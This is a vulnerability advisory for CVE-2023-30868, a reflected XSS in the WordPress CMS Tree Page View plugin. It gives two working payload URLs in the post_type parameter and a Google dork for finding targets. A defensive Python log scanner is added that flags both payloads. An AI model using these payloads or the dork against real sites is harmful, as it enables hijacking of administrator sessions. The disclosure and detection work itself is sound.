| Title | Published | Views | Reporter |
|---|---|---|---|
| Tree Page View Plugin 1.6.7 - Cross Site Scripting Vulnerability | 6 Jun 2023 00:00 | – | zdt |
| WordPress plugin CMS Tree Page View cross-site scripting vulnerability | 18 May 2023 00:00 | – | cnnvd |
| CVE-2023-30868 | 18 May 2023 08:28 | – | cve |
| CVE-2023-30868 WordPress CMS Tree Page View Plugin <= 1.6.7 is vulnerable to Cross Site Scripting (XSS) | 18 May 2023 08:28 | – | cvelist |
| Tree Page View Plugin < 1.6.7 - Cross-Site Scripting | 4 Jun 2026 03:48 | – | nuclei |
| CVE-2023-30868 | 18 May 2023 09:15 | – | nvd |
| WordPress CMS Tree Page View Plugin < 1.6.8 XSS Vulnerability | 12 Sep 2023 00:00 | – | openvas |
| CVE-2023-30868 | 18 May 2023 09:15 | – | osv |
| WordPress Tree Page View 1.6.7 Cross Site Scripting | 6 Jun 2023 00:00 | – | packetstorm |
| WordPress CMS Tree Page View Plugin <= 1.6.7 is vulnerable to Cross Site Scripting (XSS) | 24 Apr 2023 00:00 | – | patchstack |

# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
# 1. Technical Description:
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
This is because user input in the post_type parameter is not properly escaped. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever the affected page is accessed.
# 2. Proof of Concept (PoC):
WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.
1. CMS Tree Page View Plugin <= 1.6.6
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.
b. Your payload will be executed.
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
2. CMS Tree Page View Plugin <= 1.6.7
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.
b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
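
A log check for the two requests described above, as an added example that is not part of the original advisory: it flags requests to the plugin page whose post_type is not a valid WordPress post type key, and shows that a tag-based signature misses the second, attribute-only variant. The log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# WordPress post type keys: lowercase alphanumerics, dashes, underscores; 20 chars max.
VALID_POST_TYPE = re.compile(r"[a-z0-9_-]{1,20}")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PLUGIN_PAGE = "cms-tpv-page-post"  # value of the page= parameter in the URLs above

# Constructed combined-format log lines; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Apr/2023:10:00:00 +0000] "GET /wp-admin/edit.php'
    '?page=cms-tpv-page-post&post_type=page HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Apr/2023:10:01:00 +0000] "GET /wp-admin/edit.php'
    '?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
    ' HTTP/1.1" 200 5200',
    '203.0.113.7 - - [24/Apr/2023:10:02:00 +0000] "GET /wp-admin/edit.php'
    '?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript'
    '%3Aalert%281%29%3B+a%3D%22 HTTP/1.1" 200 5230',
]

def tag_signature(value):
    """Naive signature: fires only when the value contains angle brackets."""
    return "<" in value or ">" in value

def invalid_post_type(log_line):
    """Return the decoded post_type when a request to the plugin page carries a
    value that is not a valid post type key; otherwise return None."""
    match = REQUEST_LINE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    query = parse_qs(url.query, keep_blank_values=True)
    if not url.path.endswith("/wp-admin/edit.php") or PLUGIN_PAGE not in query.get("page", []):
        return None
    for value in query.get("post_type", []):
        if not VALID_POST_TYPE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (decoded value, caught_by_tag_signature) for every flagged line."""
    hits = [invalid_post_type(line) for line in lines]
    return [(v, tag_signature(v)) for v in hits if v is not None]

if __name__ == "__main__":
    for value, by_signature in scan(SAMPLE_LOG):
        print(f"flagged post_type={value!r} tag_signature_match={by_signature}")
```

The allowlist check flags both requests, while the angle-bracket signature matches only the first, which is why validating post_type against the key format is the more reliable detection and input check.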